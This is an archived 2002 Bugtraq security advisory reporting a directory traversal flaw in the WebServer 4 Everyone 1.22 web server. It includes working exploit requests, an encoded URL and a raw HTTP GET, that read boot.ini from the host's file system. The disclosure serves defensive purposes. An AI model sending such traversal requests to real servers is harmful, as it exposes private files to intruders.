[26927] in bugtraq
advisory
daemon@ATHENA.MIT.EDU (UkR security =?windows-1251?Q?team)
Thu Sep 5 17:34:29 2002
From: "UkR security =?windows-1251?Q?team=99?=" <cuctema@ok.ru>
To: bugtraq@securityfocus.com
Date: Thu, 05 Sep 2002 16:30:30 +0400
Message-ID: <web-29288022@backend2.aha.ru>
MIME-Version: 1.0
Content-Type: text/plain; charset="windows-1251"; format="flowed"
Content-Transfer-Encoding: 8bit
----------- UkR security team advisory ------------
WebServer 4 Everyone directory traversal bug
-----------------------------------------------------
Name: WebServer 4 Everyone directory traversal bug
Date: 28.08.2002
Author: UkR-XblP/ UkR security team/ http://ust.dp.ua
Application: WebServer 4 Everyone Version: 1.22
URL: http://www.freeware.lt/
Risk: An attacker can view every file in the remote sys
About: WebServer 4 Everyone is a commercial webserver
that runs on Win32 systems.
Bug: problem is caused by the character '\' (%5c) that
is not checked as bad character, so the server
follow the path in the URI that the attacker give
until it reach the file requested.
Exploits:
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
or GET /\..\..\..\..\..\boot.ini HTTP/1.0
This last is an HTTP request that can be sent with
telnet because some browsers can modify the "\.." chars.
Greetz: 2 Nadya Ostafiychuk - happy birthday !!! ;)
---
Professional hosting for everyone - http://www.host.ru
